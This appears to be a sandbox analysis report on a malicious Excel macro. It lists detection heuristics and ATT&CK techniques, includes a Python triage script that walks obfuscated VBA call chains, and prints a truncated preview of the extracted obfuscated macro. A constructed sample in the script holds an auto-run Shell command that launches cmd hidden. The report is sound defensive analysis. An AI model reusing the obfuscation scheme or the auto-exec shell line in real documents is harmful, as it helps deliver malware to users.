Verdict: MALICIOUS (risk score 228)
Malware Insights
MITRE ATT&CK
- T1566.001 Spearphishing Attachment
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1059 Command and Scripting Interpreter
- T1203 Exploitation for Client Execution
The sample is an Excel document containing a Workbook_Open VBA macro that executes a shell command. The document body displays a fake 'Macro Error' message to lure the user into enabling macros. The entry point is declared with mangled case (`WorKbOOK_oPen`); VBA identifiers are case-insensitive, so Excel still runs it as the Workbook_Open event handler, and the mangling only defeats naive case-sensitive string matching. The rest of the VBA code is heavily obfuscated: as the extracted source below shows, control passes through a long chain of randomly named one-line procedures, each of which does nothing but call the next, with varying Sub/Function declarations and return types as noise. The Shell() call itself is not visible in the truncated 1,000-line preview; it is reported by the OLE_VBA_SHELL heuristic and the p-code scan over the full 88,596-byte extracted source. Taken together, the Shell() call, the Workbook_Open auto-execution and the Environ() environment-variable access indicate intent to download and execute a second-stage payload.
Heuristics (6)
- [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Xls.Malware.Valyria-10036513-0
- [medium] OLE_VBA_MACROS: Document contains VBA macro code (4 related findings)
- [critical] OLE_VBA_SHELL: Shell() call in VBA
- [high] OLE_VBA_WBOPEN: Workbook_Open macro
- [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- [low] OLE_VBA_ENVIRON: Environ() call (environment variable access)
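The triage step the summary above describes (find the auto-exec entry point case-insensitively, walk the forwarding chain of `Call` wrappers, and check what the terminal procedure actually does) can be scripted over the `macros.bas` that oletools' olevba extracts. The following is an added example and is not code from this report, from oletools or from the sample; the embedded VBA is a constructed stand-in that copies the shape of the extracted macro (mixed-case `WorKbOOK_oPen`, one-line forwarding procedures), and its final `Shell`/`Environ` statements are invented for the demonstration, not the sample's real payload. The entry-point and token lists are the author's assumptions, not a standard.

```python
import re
from typing import Dict, List, Optional

# Constructed sample (NOT the report's payload): same forwarding-chain shape as the
# extracted macros.bas, with an invented terminal Shell()/Environ() procedure.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Option Explicit
Public Sub WorKbOOK_oPen(): Call hCMvpTIkAOFLi: End Sub
Function hCMvpTIkAOFLi() As Integer
Call FOlBtvPFVMoZv
End Function
Function FOlBtvPFVMoZv()
Call aTDggaXNalZUl
End Function
Static Sub aTDggaXNalZUl()
Dim c As String
c = Environ("COMSPEC") & " /c " & Sheet1.Range("A1").Value
Shell c, vbHide
End Sub
'''

# VBA identifiers are case-insensitive: "WorKbOOK_oPen" is still the Workbook_Open
# handler, so every comparison below is done on lowercased names (assumed list).
AUTOEXEC_NAMES = ("workbook_open", "auto_open", "autoopen",
                  "document_open", "workbook_activate")
# Execution / download / environment tokens to look for (assumed list).
EXEC_TOKENS = ("shell", "createobject", "environ", "urldownloadtofile",
               "xmlhttp", "powershell")

HEADER_RE = re.compile(r"^(?:(?:public|private|static|friend)\s+)*"
                       r"(?:sub|function)\s+([A-Za-z_]\w*)\b", re.I)
END_RE = re.compile(r"^end\s+(?:sub|function)\b", re.I)
CALL_RE = re.compile(r"^call\s+([A-Za-z_]\w*)\b", re.I)


def split_statements(line: str) -> List[str]:
    """Split a VBA line on ':' separators, ignoring ':' inside strings and ':='."""
    parts, cur, in_str = [], [], False
    for i, ch in enumerate(line):
        if ch == '"':
            in_str = not in_str
        if ch == ":" and not in_str and line[i + 1:i + 2] != "=":
            parts.append("".join(cur))
            cur = []
        else:
            cur.append(ch)
    parts.append("".join(cur))
    return [p.strip() for p in parts if p.strip()]


def parse_procedures(src: str) -> Dict[str, List[str]]:
    """Map lowercased procedure name -> body statements (comment lines dropped)."""
    procs: Dict[str, List[str]] = {}
    current: Optional[str] = None
    for raw in src.splitlines():
        for stmt in split_statements(raw):
            if stmt.startswith("'") or stmt.lower().startswith("rem "):
                continue
            header = HEADER_RE.match(stmt)
            if header and current is None:
                current = header.group(1).lower()
                procs[current] = []
            elif END_RE.match(stmt):
                current = None
            elif current is not None:
                procs[current].append(stmt)
    return procs


def follow_chain(procs: Dict[str, List[str]], entry: str) -> List[str]:
    """Follow single 'Call X' forwarding hops from entry; stop at the first
    procedure that does anything else, at an unknown target, or on a loop."""
    chain, seen = [entry], {entry}
    while True:
        calls = [m.group(1).lower() for s in procs.get(chain[-1], [])
                 for m in [CALL_RE.match(s)] if m]
        if len(calls) != 1 or calls[0] in seen or calls[0] not in procs:
            return chain
        seen.add(calls[0])
        chain.append(calls[0])


def suspicious_tokens(procs: Dict[str, List[str]], chain: List[str]) -> Dict[str, List[str]]:
    """Which procedures on the chain contain execution/download/env tokens."""
    hits = {}
    for name in chain:
        body = "\n".join(procs[name]).lower()
        found = [t for t in EXEC_TOKENS if t in body]
        if found:
            hits[name] = found
    return hits


def analyze(src: str) -> dict:
    """Triage summary: auto-exec entry points, the chain each reaches, tokens found."""
    procs = parse_procedures(src)
    entries = [n for n in procs if n in AUTOEXEC_NAMES]
    chains = {}
    for entry in entries:
        chain = follow_chain(procs, entry)
        chains[entry] = {"chain": chain, "hops": len(chain) - 1,
                         "tokens": suspicious_tokens(procs, chain)}
    return {"procedures": len(procs), "entries": entries, "chains": chains,
            "auto_exec_to_exec": any(c["tokens"] for c in chains.values())}


if __name__ == "__main__":
    for entry, info in analyze(SAMPLE_VBA)["chains"].items():
        print(f"{entry}: {info['hops']} hops -> {info['chain'][-1]} tokens={info['tokens']}")
```

Run against real output, pass the text of `macros.bas` (as written by `olevba`) to `analyze()` instead of `SAMPLE_VBA`; on a document like this one the chain is hundreds of hops long and the tokens appear only in the last procedure. The walker deliberately stops at the first procedure that is not a pure forwarder, so the terminal body is what you then read by hand. It only follows explicit `Call` statements, so a chain that forwards with a bare procedure name, `Application.Run`, or a `CallByName` string would stop early; the p-code heuristic in the report is the fallback when source extraction fails or the source has been stomped.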
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 88596 bytes | e361d773fbc4e9e44732e39975ed956ab4061ea77321547ca2fe6c655a3e2c71 |

Preview: first 1,000 lines of the extracted script (macros.bas)
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Option Explicit
Public Sub WorKbOOK_oPen(): Call hCMvpTIkAOFLi: End Sub
Function hCMvpTIkAOFLi() As Integer
Call FOlBtvPFVMoZv
End Function
Function FOlBtvPFVMoZv()
Call aTDggaXNalZUl
End Function
Sub aTDggaXNalZUl()
Call kJTWGQHxQmEfE
End Sub
Function kJTWGQHxQmEfE()
Call IVrcKrNSkknuR
End Function
Static Sub IVrcKrNSkknuR()
Call TFzquHUVycZSh
End Sub
Private Sub TFzquHUVycZSh()
Call bMvFrzuhybhgj
End Sub
Private Function bMvFrzuhybhgj() As Long
Call VxjDJGyHTdkrq
End Function
Private Function VxjDJGyHTdkrq() As Boolean
Call BUudHzXGJGbhe
End Function
Private Sub BUudHzXGJGbhe()
Call sVOBwISIpGHuU
End Sub
Function sVOBwISIpGHuU() As Long
Call jWiZlRMKUGoHK
End Function
Sub jWiZlRMKUGoHK()
Call OTYFuMxkSWAAI
End Sub
Private Function OTYFuMxkSWAAI() As Boolean
Call oPQmbmMccWGNm
End Function
Static Sub oPQmbmMccWGNm()
Call PLISJLbVnXLZR
End Sub
Private Sub PLISJLbVnXLZR()
Call kchpfRxJtbkIY
End Sub
Static Function kchpfRxJtbkIY() As Double
Call IoGvjsDfNZTWk
End Function
Static Sub IoGvjsDfNZTWk()
Call SeVlJimODayiD
End Sub
Private Sub SeVlJimODayiD()
Call ziSribVAQPIwY
End Sub
Sub ziSribVAQPIwY()
Call HpOGeTwMQOQJZ
End Sub
Function HpOGeTwMQOQJZ() As Single
Call BaCFxazmlQTVh
End Function
Function BaCFxazmlQTVh() As String
Call GBVyOuJsRsEyq
End Function
Static Function GBVyOuJsRsEyq() As Byte
Call yCpWDCEuwslLf
End Function
Static Sub yCpWDCEuwslLf()
Call pDJusLzxbsSYV
End Sub
Sub pDJusLzxbsSYV()
Call vobUwfdBFJuDH
End Sub
Sub vobUwfdBFJuDH()
Call WkTAeEsuPKAPl
End Sub
Function WkTAeEsuPKAPl() As String
Call KBUxpQeYEHKeJ
End Function
Sub KBUxpQeYEHKeJ()
Call XLxGPdZBLMbzP
End Sub
Static Function XLxGPdZBLMbzP() As Variant
Call pCBjwlGPYDVlh
End Function
Private Sub pCBjwlGPYDVlh()
Call RrZoBHkCoWVVc
End Sub
Sub RrZoBHkCoWVVc()
Call ZxWDyzLOoVdid
End Sub
Sub ZxWDyzLOoVdid()
Call TjJCQFOoJXgul
End Sub
Function TjJCQFOoJXgul() As Double
Call apFQMypAJWoIm
End Function
Function apFQMypAJWoIm() As Single
Call iwCfJqQMJVwVn
End Function
Function iwCfJqQMJVwVn() As String
Call bipebwTmeXzhv
End Function
Sub bipebwTmeXzhv()
Call joltXpuyeWHuw
End Sub
Sub joltXpuyeWHuw()
Call rvhIUhVJeVPIx
End Sub
Sub rvhIUhVJeVPIx()
Call kgVGmoYjzYSTF
End Sub
Function kgVGmoYjzYSTF() As Date
Call snRVjgzvzXahG
End Function
Function snRVjgzvzXahG() As Variant
Call ztNkfYaHzVjvI
End Function
Function ztNkfYaHzVjvI() As Currency
Call tfBixfdhUYmGP
End Function
Private Sub tfBixfdhUYmGP()
Call BmxxuXEtUXuUR
End Sub
Static Sub BmxxuXEtUXuUR()
Call IstMqPfFUWCiS
End Sub
Static Function IstMqPfFUWCiS() As Currency
Call CehLJWifpYFtZ
End Function
Function CehLJWifpYFtZ() As Object
Call KkdZFOJrpXNHb
End Function
Function KkdZFOJrpXNHb() As String
Call RDgglhxipAJJt
End Function
Function RDgglhxipAJJt() As Byte
Call IEAEaqskUAqWj
End Function
Sub IEAEaqskUAqWj()
Call zFUcOznnAAXkY
End Sub
Function zFUcOznnAAXkY() As String
Call qHozDIipfADxO
End Function
Static Sub qHozDIipfADxO()
Call hIIXsRdsKAkKE
End Sub
Static Function hIIXsRdsKAkKE() As Object
Call YJcvhZYupzRXu
End Function
Sub YJcvhZYupzRXu()
Call QLxTWiTwUzykk
End Sub
Function QLxTWiTwUzykk() As Single
Call HMRqLrOzzzfxa
End Function
Sub HMRqLrOzzzfxa()
Call yNlOAAJBfzLKP
End Sub
Static Function yNlOAAJBfzLKP() As Currency
Call pPFmoJEDKysYF
End Function
Static Sub pPFmoJEDKysYF()
Call gQZKdSzGpyZlv
End Sub
Static Function gQZKdSzGpyZlv() A
... (truncated)